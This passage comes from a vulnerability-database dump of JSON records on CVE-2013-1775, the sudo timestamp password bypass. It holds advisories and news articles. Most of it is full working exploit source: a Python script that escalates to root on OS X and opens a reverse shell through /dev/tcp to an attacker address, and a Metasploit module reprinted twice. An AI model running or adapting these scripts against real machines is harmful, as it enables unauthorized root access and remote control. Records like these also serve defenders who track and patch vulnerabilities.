vn_str.split(/[\\.p]/).map(&:to_i)\n end\n\n def vn_bt(vn, ranges) # e.g. ('1.7.1', [['1.7.0', '1.7.6p44']])\n vn_parts = parse_vn(vn)\n ranges.any? do |range|\n min_parts = parse_vn(range[0])\n max_parts = parse_vn(range[1])\n vn_parts.all? do |part|\n min = min_parts.shift\n max = max_parts.shift\n (min.nil? or (not part.nil? and part >= min)) and\n (part.nil? or (not max.nil? and part <= max))\n end\n end\n end\nend\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/local/sudo_password_bypass.rb"}], "ubuntu": [{"lastseen": "2020-07-02T11:36:35", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1775"], "description": "Marco Schoepl discovered that Sudo incorrectly handled time stamp files \nwhen the system clock is set to epoch. A local attacker could use this \nissue to run Sudo commands without a password prompt.", "edition": 5, "modified": "2013-02-28T00:00:00", "published": "2013-02-28T00:00:00", "id": "USN-1754-1", "href": "https://ubuntu.com/security/notices/USN-1754-1", "title": "Sudo vulnerability", "type": "ubuntu", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:00", "description": "", "published": "2013-08-30T00:00:00", "type": "packetstorm", "title": "Mac OS X 10.8.4 Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1775"], "modified": "2013-08-30T00:00:00", "id": "PACKETSTORM:123032", "href": "https://packetstormsecurity.com/files/123032/Mac-OS-X-10.8.4-Local-Privilege-Escalation.html", "sourceData": "`#!/usr/bin/python \n \n# Original MSF Module: \n# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudo_password_bypass.rb \n \n################################################################################################### \n# Exploit Title: OSX <= 10.8.4 Local Root Priv Escalation Root Reverse Shell \n# 
Date: 08-27-2013 \n# Exploit Author: David Kennedy @ TrustedSec \n# Website: https://www.trustedsec.com \n# Twitter: @Dave_ReL1K \n# Tested On: OSX 10.8.4 \n# \n# Reference: http://www.exploit-db.com/exploits/27944/ \n# \n# Example below: \n# trustedsec:Desktop Dave$ python osx_esc.py \n# [*] Exploit has been performed. You should have a shell on ipaddr: 127.0.0.1 and port 4444 \n# \n# attacker_box:~ Dave$ nc -l 4444 \n# bash: no job control in this shell \n# bash-3.2# \n################################################################################################### \nimport subprocess \n \n# IPADDR for REVERSE SHELL - change this to your attacker IP address \nipaddr = \"192.168.1.1\" \n \n# PORT for REVERSE SHELL - change this to your attacker port address \nport = \"4444\" \n \n# drop into a root shell - replace 192.168.1.1 with the reverse listener \nproc = subprocess.Popen('bash', shell=False, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE) \nproc.stdin.write(\"systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su\\nbash -i >& /dev/tcp/%s/%s 0>&1 &\\n\" % (ipaddr,port)) \nprint \"\"\" \n############################################################### \n# \n# OSX < 10.8.4 Local Root Priv Escalation Root Reverse Shell \n# \n# Written by: David Kennedy @ TrustedSec \n# Website: https://www.trustedsec.com \n# Twitter: @Dave_ReL1K \n# \n# Reference: http://www.exploit-db.com/exploits/27944/ \n############################################################### \n\"\"\" \nprint \"[*] Exploit has been performed. 
You should have a shell on ipaddr: %s and port %s\" % (ipaddr,port) \n \n`\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/123032/macosx1084-sudo.txt"}, {"lastseen": "2016-12-05T22:24:22", "description": "", "published": "2013-08-26T00:00:00", "type": "packetstorm", "title": "Mac OS X Sudo Password Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1775"], "modified": "2013-08-26T00:00:00", "id": "PACKETSTORM:122965", "href": "https://packetstormsecurity.com/files/122965/Mac-OS-X-Sudo-Password-Bypass.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# \n# http://metasploit.com/ \n## \nrequire 'shellwords' \n \nclass Metasploit3 < Msf::Exploit::Local \n \n# ManualRanking because it's going to modify system time \n# Even when it will try to restore things, user should use \n# it at his own risk \nRank = NormalRanking \n \ninclude Msf::Post::Common \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \nSYSTEMSETUP_PATH = \"/usr/sbin/systemsetup\" \nSUDOER_GROUP = \"admin\" \nVULNERABLE_VERSION_RANGES = [['1.6.0', '1.7.10p6'], ['1.8.0', '1.8.6p6']] \n \n# saved clock config \nattr_accessor :time, :date, :networked, :zone, :network_server \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Mac OS X Sudo Password Bypass', \n'Description' => %q{ \nThis module gains a session with root permissions on versions of OS X with \nsudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4, \nand possibly lower versions. 
\n \nIf your session belongs to a user with Administrative Privileges \n(the user is in the sudoers file and is in the \"admin group\"), and the \nuser has ever run the \"sudo\" command, it is possible to become the super \nuser by running `sudo -k` and then resetting the system clock to 01-01-1970. \n \nThis module will fail silently if the user is not an admin or if the user has never \nrun the sudo command. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Todd C. Miller', # Vulnerability discovery \n'joev <jvennix[at]rapid7.com>', # Metasploit module \n'juan vazquez' # testing/fixing module bugs \n], \n'References' => \n[ \n[ 'CVE', '2013-1775' ], \n[ 'OSVDB', '90677' ], \n[ 'BID', '58203' ], \n[ 'URL', 'http://www.sudo.ws/sudo/alerts/epoch_ticket.html' ] \n], \n'Platform' => 'osx', \n'Arch' => [ ARCH_X86, ARCH_X86_64, ARCH_CMD ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Targets' => [ \n[ 'Mac OS X x86 (Native Payload)', \n{ \n'Platform' => 'osx', \n'Arch' => ARCH_X86 \n} \n], \n[ 'Mac OS X x64 (Native Payload)', \n{ \n'Platform' => 'osx', \n'Arch' => ARCH_X86_64 \n} \n], \n[ 'CMD', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Feb 28 2013' \n)) \nregister_advanced_options([ \nOptString.new('TMP_FILE', \n[true,'For the native targets, specifies the path that '+ \n'the executable will be dropped on the client machine.', \n'/tmp/.<random>/<random>'] \n), \n], self.class) \nend \n \n# ensure target is vulnerable by checking sudo vn and checking \n# user is in admin group. 
\ndef check \nif cmd_exec(\"sudo -V\") =~ /version\\s+([^\\s]*)\\s*$/ \nsudo_vn = $1 \nsudo_vn_parts = sudo_vn.split(/[\\.p]/).map(&:to_i) \n# check vn between 1.6.0 through 1.7.10p6 \n# and 1.8.0 through 1.8.6p6 \nif not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES) \nprint_error \"sudo version #{sudo_vn} not vulnerable.\" \nreturn Exploit::CheckCode::Safe \nend \nelse \nprint_error \"sudo not detected on the system.\" \nreturn Exploit::CheckCode::Safe \nend \n \nif not user_in_admin_group? \nprint_error \"sudo version is vulnerable, but user is not in the admin group (necessary to change the date).\" \nExploit::CheckCode::Safe \nend \n# one root for you sir \nExploit::CheckCode::Vulnerable \nend \n \ndef exploit \nif not user_in_admin_group? \nfail_with(Exploit::Failure::NotFound, \"User is not in the 'admin' group, bailing.\") \nend \n# \"remember\" the current system time/date/network/zone \nprint_good(\"User is an admin, continuing...\") \n \n# drop the payload (unless CMD) \nif using_native_target? \ncmd_exec(\"mkdir -p #{File.dirname(drop_path)}\") \nwrite_file(drop_path, generate_payload_exe) \nregister_files_for_cleanup(drop_path) \ncmd_exec(\"chmod +x #{[drop_path].shelljoin}\") \nprint_status(\"Payload dropped and registered for cleanup\") \nend \n \nprint_status(\"Saving system clock config...\") \n@time = cmd_exec(\"#{SYSTEMSETUP_PATH} -gettime\").match(/^time: (.*)$/i)[1] \n@date = cmd_exec(\"#{SYSTEMSETUP_PATH} -getdate\").match(/^date: (.*)$/i)[1] \n@networked = cmd_exec(\"#{SYSTEMSETUP_PATH} -getusingnetworktime\") =~ (/On$/) \n@zone = cmd_exec(\"#{SYSTEMSETUP_PATH} -gettimezone\").match(/^time zone: (.*)$/i)[1] \n@network_server = if @networked \ncmd_exec(\"#{SYSTEMSETUP_PATH} -getnetworktimeserver\").match(/time server: (.*)$/i)[1] \nend \n \nrun_sudo_cmd \nend \n \ndef cleanup \nprint_status(\"Resetting system clock to original values\") if @time \ncmd_exec(\"#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}\") unless @zone.nil? 
\ncmd_exec(\"#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}\") unless @date.nil? \ncmd_exec(\"#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}\") unless @time.nil? \n \nif @networked \ncmd_exec(\"#{SYSTEMSETUP_PATH} -setusingnetworktime On\") \nunless @network_server.nil? \ncmd_exec(\"#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}\") \nend \nend \n \nprint_good(\"Completed clock reset.\") if @time \nend \n \nprivate \n \ndef run_sudo_cmd \nprint_status(\"Resetting user's time stamp file and setting clock to the epoch\") \ncmd_exec( \n\"sudo -k; \\n\"+ \n\"#{SYSTEMSETUP_PATH} -setusingnetworktime Off -settimezone GMT\"+ \n\" -setdate 01:01:1970 -settime 00:00\" \n) \n \n# Run Test \ntest = rand_text_alpha(4 + rand(4)) \nsudo_cmd_test = ['sudo', '-S', [\"echo #{test}\"].shelljoin].join(' ') \n \nprint_status(\"Testing that user has sudoed before...\") \noutput = cmd_exec('echo \"\" | ' + sudo_cmd_test) \n \nif output =~ /incorrect password attempts\\s*$/i \nfail_with(Exploit::Failure::NotFound, \"User has never run sudo, and is therefore not vulnerable. Bailing.\") \nelsif output =~ /#{test}/ \nprint_good(\"Test executed succesfully. Running payload.\") \nelse \nprint_error(\"Unknown fail while testing, trying to execute the payload anyway...\") \nend \n \n# Run Payload \nsudo_cmd_raw = if using_native_target? \n['sudo', '-S', [drop_path].shelljoin].join(' ') \nelsif using_cmd_target? 
\n['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ') \nend \n \n## to prevent the password prompt from destroying session \n## backgrounding the sudo payload in order to keep both sessions usable \nsudo_cmd = 'echo \"\" | ' + sudo_cmd_raw + ' & true' \n \nprint_status \"Running command: \" \nprint_line sudo_cmd \noutput = cmd_exec(sudo_cmd) \n \nend \n \n# helper methods for accessing datastore \ndef using_native_target?; target.name =~ /native/i; end \ndef using_cmd_target?; target.name =~ /cmd/i; end \ndef drop_path \n@_drop_path ||= datastore['TMP_FILE'].gsub('<random>') { Rex::Text.rand_text_alpha(10) } \nend \n \n# checks that the user is in OSX's admin group, necessary to change sys clock \ndef user_in_admin_group? \ncmd_exec(\"groups `whoami`\").split(/\\s+/).include?(SUDOER_GROUP) \nend \n \n# helper methods for dealing with sudo's vn num \ndef parse_vn(vn_str); vn_str.split(/[\\.p]/).map(&:to_i); end \ndef vn_bt(vn, ranges) # e.g. ('1.7.1', [['1.7.0', '1.7.6p44']]) \nvn_parts = parse_vn(vn) \nranges.any? do |range| \nmin_parts = parse_vn(range[0]) \nmax_parts = parse_vn(range[1]) \nvn_parts.all? do |part| \nmin = min_parts.shift \nmax = max_parts.shift \n(min.nil? or (not part.nil? and part >= min)) and \n(part.nil? or (not max.nil? 
and part <= max)) \nend \nend \nend \n \nend \n`\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/122965/sudo_password_bypass.rb.txt"}], "canvas": [{"lastseen": "2019-05-29T19:48:19", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1775"], "edition": 2, "description": "**Name**| sudo_timestamp \n---|--- \n**CVE**| CVE-2013-1775 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| sudo_timestamp: Linux/MacOS timestamp privilege escalation \n**Notes**| CVE Name: CVE-2013-1775 \nVENDOR: Intel, GNU/Linux, Apple \nNotes: \nThis exploit runs on GNU/Linux and MacOS X. \n \nOn both systems this exploit requires: \n\\- User has run at least once \"sudo\" \n\\- User is an admin \n \nOn GNU/Linux it also requires that the user is currently logged in \non a wm session and has an open terminal with a bound sudo timestamp \nticket (an open pts/ on which the user has run sudo at least once). \n \nRepeatability: Infinite \nReferences: http://www.sudo.ws/sudo/alerts/epoch_ticket.html \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1775 \n\n", "modified": "2013-03-05T21:38:00", "published": "2013-03-05T21:38:00", "id": "SUDO_TIMESTAMP", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/sudo_timestamp", "type": "canvas", "title": "Immunity Canvas: SUDO_TIMESTAMP", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-02T07:03:07", "edition": 2, "description": "This Metasploit module gains a session with root permissions on versions of OS X with sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4, and possibly lower versions. 
If your session belongs to a user with Administrative Privileges (the user is in the sudoers file and is in the \"admin group\"), and the user has ever run the \"sudo\" command, it is possible to become the super user by running `sudo -k` and then resetting the system clock to 01-01-1970. This Metasploit module will fail silently if the user is not an admin or if the user has never run the sudo command.", "published": "2013-08-27T00:00:00", "type": "zdt", "title": "Mac OS X Sudo Password Bypass Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1775"], "modified": "2013-08-27T00:00:00", "id": "1337DAY-ID-21166", "href": "https://0day.today/exploit/description/21166", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n#\r\n# http://metasploit.com/\r\n##\r\nrequire 'shellwords'\r\n\r\nclass Metasploit3 < Msf::Exploit::Local\r\n\r\n # ManualRanking because it's going to modify system time\r\n # Even when it will try to restore things, user should use\r\n # it at his own risk\r\n Rank = NormalRanking\r\n\r\n include Msf::Post::Common\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n SYSTEMSETUP_PATH = \"/usr/sbin/systemsetup\"\r\n SUDOER_GROUP = \"admin\"\r\n VULNERABLE_VERSION_RANGES = [['1.6.0', '1.7.10p6'], ['1.8.0', '1.8.6p6']]\r\n\r\n # saved clock config\r\n attr_accessor :time, :date, :networked, :zone, :network_server\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Mac OS X Sudo Password Bypass',\r\n 'Description' => %q{\r\n This module gains a session with root permissions on versions of OS X with\r\n sudo binary vulnerable to CVE-2013-1775. 
Tested working on Mac OS 10.7-10.8.4,\r\n and possibly lower versions.\r\n\r\n If your session belongs to a user with Administrative Privileges\r\n (the user is in the sudoers file and is in the \"admin group\"), and the\r\n user has ever run the \"sudo\" command, it is possible to become the super\r\n user by running `sudo -k` and then resetting the system clock to 01-01-1970.\r\n\r\n This module will fail silently if the user is not an admin or if the user has never\r\n run the sudo command.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Todd C. Miller', # Vulnerability discovery\r\n 'joev <jvennix[at]rapid7.com>', # Metasploit module\r\n 'juan vazquez' # testing/fixing module bugs\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1775' ],\r\n [ 'OSVDB', '90677' ],\r\n [ 'BID', '58203' ],\r\n [ 'URL', 'http://www.sudo.ws/sudo/alerts/epoch_ticket.html' ]\r\n ],\r\n 'Platform' => 'osx',\r\n 'Arch' => [ ARCH_X86, ARCH_X86_64, ARCH_CMD ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [\r\n [ 'Mac OS X x86 (Native Payload)',\r\n {\r\n 'Platform' => 'osx',\r\n 'Arch' => ARCH_X86\r\n }\r\n ],\r\n [ 'Mac OS X x64 (Native Payload)',\r\n {\r\n 'Platform' => 'osx',\r\n 'Arch' => ARCH_X86_64\r\n }\r\n ],\r\n [ 'CMD',\r\n {\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Feb 28 2013'\r\n ))\r\n register_advanced_options([\r\n OptString.new('TMP_FILE',\r\n [true,'For the native targets, specifies the path that '+\r\n 'the executable will be dropped on the client machine.',\r\n '/tmp/.<random>/<random>']\r\n ),\r\n ], self.class)\r\n end\r\n\r\n # ensure target is vulnerable by checking sudo vn and checking\r\n # user is in admin group.\r\n def check\r\n if cmd_exec(\"sudo -V\") =~ /version\\s+([^\\s]*)\\s*$/\r\n sudo_vn = $1\r\n sudo_vn_parts = sudo_vn.split(/[\\.p]/).map(&:to_i)\r\n # check vn between 1.6.0 through 1.7.10p6\r\n # and 1.8.0 through 1.8.6p6\r\n if not 
vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES)\r\n print_error \"sudo version #{sudo_vn} not vulnerable.\"\r\n return Exploit::CheckCode::Safe\r\n end\r\n else\r\n print_error \"sudo not detected on the system.\"\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n if not user_in_admin_group?\r\n print_error \"sudo version is vulnerable, but user is not in the admin group (necessary to change the date).\"\r\n Exploit::CheckCode::Safe\r\n end\r\n # one root for you sir\r\n Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n def exploit\r\n if not user_in_admin_group?\r\n fail_with(Exploit::Failure::NotFound, \"User is not in the 'admin' group, bailing.\")\r\n end\r\n # \"remember\" the current system time/date/network/zone\r\n print_good(\"User is an admin, continuing...\")\r\n\r\n # drop the payload (unless CMD)\r\n if using_native_target?\r\n cmd_exec(\"mkdir -p #{File.dirname(drop_path)}\")\r\n write_file(drop_path, generate_payload_exe)\r\n register_files_for_cleanup(drop_path)\r\n cmd_exec(\"chmod +x #{[drop_path].shelljoin}\")\r\n print_status(\"Payload dropped and registered for cleanup\")\r\n end\r\n\r\n print_status(\"Saving system clock config...\")\r\n @time = cmd_exec(\"#{SYSTEMSETUP_PATH} -gettime\").match(/^time: (.*)$/i)[1]\r\n @date = cmd_exec(\"#{SYSTEMSETUP_PATH} -getdate\").match(/^date: (.*)$/i)[1]\r\n @networked = cmd_exec(\"#{SYSTEMSETUP_PATH} -getusingnetworktime\") =~ (/On$/)\r\n @zone = cmd_exec(\"#{SYSTEMSETUP_PATH} -gettimezone\").match(/^time zone: (.*)$/i)[1]\r\n @network_server = if @networked\r\n cmd_exec(\"#{SYSTEMSETUP_PATH} -getnetworktimeserver\").match(/time server: (.*)$/i)[1]\r\n end\r\n\r\n run_sudo_cmd\r\n end\r\n\r\n def cleanup\r\n print_status(\"Resetting system clock to original values\") if @time\r\n cmd_exec(\"#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}\") unless @zone.nil?\r\n cmd_exec(\"#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}\") unless @date.nil?\r\n cmd_exec(\"#{SYSTEMSETUP_PATH} -settime 
#{[@time].shelljoin}\") unless @time.nil?\r\n\r\n if @networked\r\n cmd_exec(\"#{SYSTEMSETUP_PATH} -setusingnetworktime On\")\r\n unless @network_server.nil?\r\n cmd_exec(\"#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}\")\r\n end\r\n end\r\n\r\n print_good(\"Completed clock reset.\") if @time\r\n end\r\n\r\n private\r\n\r\n def run_sudo_cmd\r\n print_status(\"Resetting user's time stamp file and setting clock to the epoch\")\r\n cmd_exec(\r\n \"sudo -k; \\n\"+\r\n \"#{SYSTEMSETUP_PATH} -setusingnetworktime Off -settimezone GMT\"+\r\n \" -setdate 01:01:1970 -settime 00:00\"\r\n )\r\n\r\n # Run Test\r\n test = rand_text_alpha(4 + rand(4))\r\n sudo_cmd_test = ['sudo', '-S', [\"echo #{test}\"].shelljoin].join(' ')\r\n\r\n print_status(\"Testing that user has sudoed before...\")\r\n output = cmd_exec('echo \"\" | ' + sudo_cmd_test)\r\n\r\n if output =~ /incorrect password attempts\\s*$/i\r\n fail_with(Exploit::Failure::NotFound, \"User has never run sudo, and is therefore not vulnerable. Bailing.\")\r\n elsif output =~ /#{test}/\r\n print_good(\"Test executed succesfully. 
Running payload.\")\r\n else\r\n print_error(\"Unknown fail while testing, trying to execute the payload anyway...\")\r\n end\r\n\r\n # Run Payload\r\n sudo_cmd_raw = if using_native_target?\r\n ['sudo', '-S', [drop_path].shelljoin].join(' ')\r\n elsif using_cmd_target?\r\n ['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ')\r\n end\r\n\r\n ## to prevent the password prompt from destroying session\r\n ## backgrounding the sudo payload in order to keep both sessions usable\r\n sudo_cmd = 'echo \"\" | ' + sudo_cmd_raw + ' & true'\r\n\r\n print_status \"Running command: \"\r\n print_line sudo_cmd\r\n output = cmd_exec(sudo_cmd)\r\n\r\n end\r\n\r\n # helper methods for accessing datastore\r\n def using_native_target?; target.name =~ /native/i; end\r\n def using_cmd_target?; target.name =~ /cmd/i; end\r\n def drop_path\r\n @_drop_path ||= datastore['TMP_FILE'].gsub('<random>') { Rex::Text.rand_text_alpha(10) }\r\n end\r\n\r\n # checks that the user is in OSX's admin group, necessary to change sys clock\r\n def user_in_admin_group?\r\n cmd_exec(\"groups `whoami`\").split(/\\s+/).include?(SUDOER_GROUP)\r\n end\r\n\r\n # helper methods for dealing with sudo's vn num\r\n def parse_vn(vn_str); vn_str.split(/[\\.p]/).map(&:to_i); end\r\n def vn_bt(vn, ranges) # e.g. ('1.7.1', [['1.7.0', '1.7.6p44']])\r\n vn_parts = parse_vn(vn)\r\n ranges.any? do |range|\r\n min_parts = parse_vn(range[0])\r\n max_parts = parse_vn(range[1])\r\n vn_parts.all? do |part|\r\n min = min_parts.shift\r\n max = max_parts.shift\r\n (min.nil? or (not part.nil? and part >= min)) and\r\n (part.nil? or (not max.nil? 
and part <= max))\r\n end\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21166"}], "threatpost": [{"lastseen": "2018-10-06T23:00:15", "bulletinFamily": "info", "cvelist": ["CVE-2013-1775"], "description": "Attackers looking to exploit a previously disclosed and apparently still unpatched bug in sudo, a Unix-based Linux command found in most Apple OS X builds have gotten a little more help this week.\n\nAs [Threatpost reported](<http://threatpost.com/time-stamp-bug-sudo-could-have-allowed-code-entry-030513/77587>) in March, the vulnerability ([CVE-2013-1775](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1775>)) can essentially set back the compromised system\u2019s clock to January 1, 1970, also known as the epoch, so the attacker can be granted access to the machine without entering a password.\n\n[Sudo](<http://www.sudo.ws/sudo/stable.html>) manages user privileges on several types of systems, including versions of OS X from Lion 10.7 to Mountain Lion 10.8.4, as well as several Linux distributions.\n\nMetasploit, the penetration testing software that makes it easier to exploit vulnerabilities, added a module this week that makes exploiting the sudo vulnerability less difficult.\n\nDeveloped by the folks over at Rapid 7, the Metasploit tool has proved invaluable for security researchers who investigate flaws and \u201cpen test\u201d software.\n\nThe module \u201cgains a session with root permissions\u201d as long as the user has run the sudo command before and as long as they have administrative privileges, according to a [Packet Storm Security](<http://packetstormsecurity.com/files/122965>) post Monday by sudo developer Todd Miller, Rapid 7\u2019s Joe Vennix and Metasploit developer Juan Vazquez.\n\nIn addition to the previously mentioned conditions, they of course must have physical or remote access on 
top of admin access to the machine, making execution of the bug even less likely.\n\nMiller previously reported that Sudo 1.8.6p7 and 1.7.10p7 fixed the bug and made it so future versions would ignore the epoch time stamp, in a [Seclists post](<http://seclists.org/oss-sec/2013/q1/489>) in February but this module appears to circumvent that.\n", "modified": "2013-08-29T17:28:56", "published": "2013-08-29T13:28:56", "id": "THREATPOST:F7D745AB279D28510E91229D1CA48DC0", "href": "https://threatpost.com/metasploit-module-adds-sudo-vulnerability-for-os-x/102138/", "type": "threatpost", "title": "Metasploit Module Adds Sudo Vulnerability for OS X", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:12", "bulletinFamily": "info", "cvelist": ["CVE-2013-1775"], "description": "A vulnerability in sudo \u2013 a program that manages user privileges on certain types of systems \u2013 could allow an unauthenticated user to execute commands for about five minutes, without entering a password.\n\nThe problem, which has since been fixed, previously existed in builds 1.6.0 through 1.7.10p6 and 1.8.0 through 1.8.6p6 of [sudo](<http://www.sudo.ws/sudo/intro.html>). The program is usually found in Unix-based Linux and Mac OS X systems.\n\nAccording to an alert on its site, Sudo claims the vulnerable five minute time period stems from a time stamp that usually authorizes users to run the program after they\u2019ve authenticated. The bug, discovered by German researcher Marco Schoepl last week, involves tricking the system\u2019s clock by setting it to the epoch reference date 1970-01-01 01:00:00. Attackers could have access to the clock if a user leaves their sudo system open to date/time changes or if the battery is completely drained. 
From there they can use \u201csudo -k\u201d kill syntax to reset the time stamp file and execute commands without a password prompt.\n\nCanonical, [working with Ubuntu](<http://www.ubuntu.com/usn/usn-1754-1/>), publicized the vulnerability ([CVE-2013-1775](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1775>)) last week after it was posted to Seclists.org\u2019s [Full Disclosure lists](<http://seclists.org/oss-sec/2013/q1/489>) by sudo developer Todd Miller.\n\nNew versions of sudo, 1.8.6p7 and 1.7.10p7, fix the vulnerability and going forward the program will ignore any time stamps set to epoch.\n", "modified": "2013-04-17T16:30:36", "published": "2013-03-05T18:17:50", "id": "THREATPOST:4FCE977F9517BD5F5952F684C88CEBE0", "href": "https://threatpost.com/time-stamp-bug-sudo-could-have-allowed-code-entry-030513/77587/", "type": "threatpost", "title": "Time Stamp Bug in Sudo Could Have Allowed Code Entry", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "cvelist": ["CVE-2013-1775"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-1754-1\r\nFebruary 28, 2013\r\n\r\nsudo vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 12.10\r\n- Ubuntu 12.04 LTS\r\n- Ubuntu 11.10\r\n- Ubuntu 10.04 LTS\r\n- Ubuntu 8.04 LTS\r\n\r\nSummary:\r\n\r\nSudo could be made to run programs as the administrator without a password\r\nprompt.\r\n\r\nSoftware Description:\r\n- sudo: Provide limited super user privileges to specific users\r\n\r\nDetails:\r\n\r\nMarco Schoepl discovered that Sudo incorrectly handled time stamp files\r\nwhen the system clock is set to epoch. 
A local attacker could use this\r\nissue to run Sudo commands without a password prompt.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 12.10:\r\n sudo 1.8.5p2-1ubuntu1.1\r\n sudo-ldap 1.8.5p2-1ubuntu1.1\r\n\r\nUbuntu 12.04 LTS:\r\n sudo 1.8.3p1-1ubuntu3.4\r\n sudo-ldap 1.8.3p1-1ubuntu3.4\r\n\r\nUbuntu 11.10:\r\n sudo 1.7.4p6-1ubuntu2.2\r\n sudo-ldap 1.7.4p6-1ubuntu2.2\r\n\r\nUbuntu 10.04 LTS:\r\n sudo 1.7.2p1-1ubuntu5.6\r\n sudo-ldap 1.7.2p1-1ubuntu5.6\r\n\r\nUbuntu 8.04 LTS:\r\n sudo 1.6.9p10-1ubuntu3.10\r\n sudo-ldap 1.6.9p10-1ubuntu3.10\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-1754-1\r\n CVE-2013-1775\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/sudo/1.8.5p2-1ubuntu1.1\r\n https://launchpad.net/ubuntu/+source/sudo/1.8.3p1-1ubuntu3.4\r\n https://launchpad.net/ubuntu/+source/sudo/1.7.4p6-1ubuntu2.2\r\n https://launchpad.net/ubuntu/+source/sudo/1.7.2p1-1ubuntu5.6\r\n https://launchpad.net/ubuntu/+source/sudo/1.6.9p10-1ubuntu3.10\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n", "edition": 1, "modified": "2013-03-02T00:00:00", "published": "2013-03-02T00:00:00", "id": "SECURITYVULNS:DOC:29109", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29109", "title": "[USN-1754-1] Sudo vulnerability", "type": "securityvulns", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:50", "bulletinFamily": "software", "cvelist": ["CVE-2013-1775", "CVE-2013-1776"], "description": "It's possible to bypass password request by manipulating timestamps. 
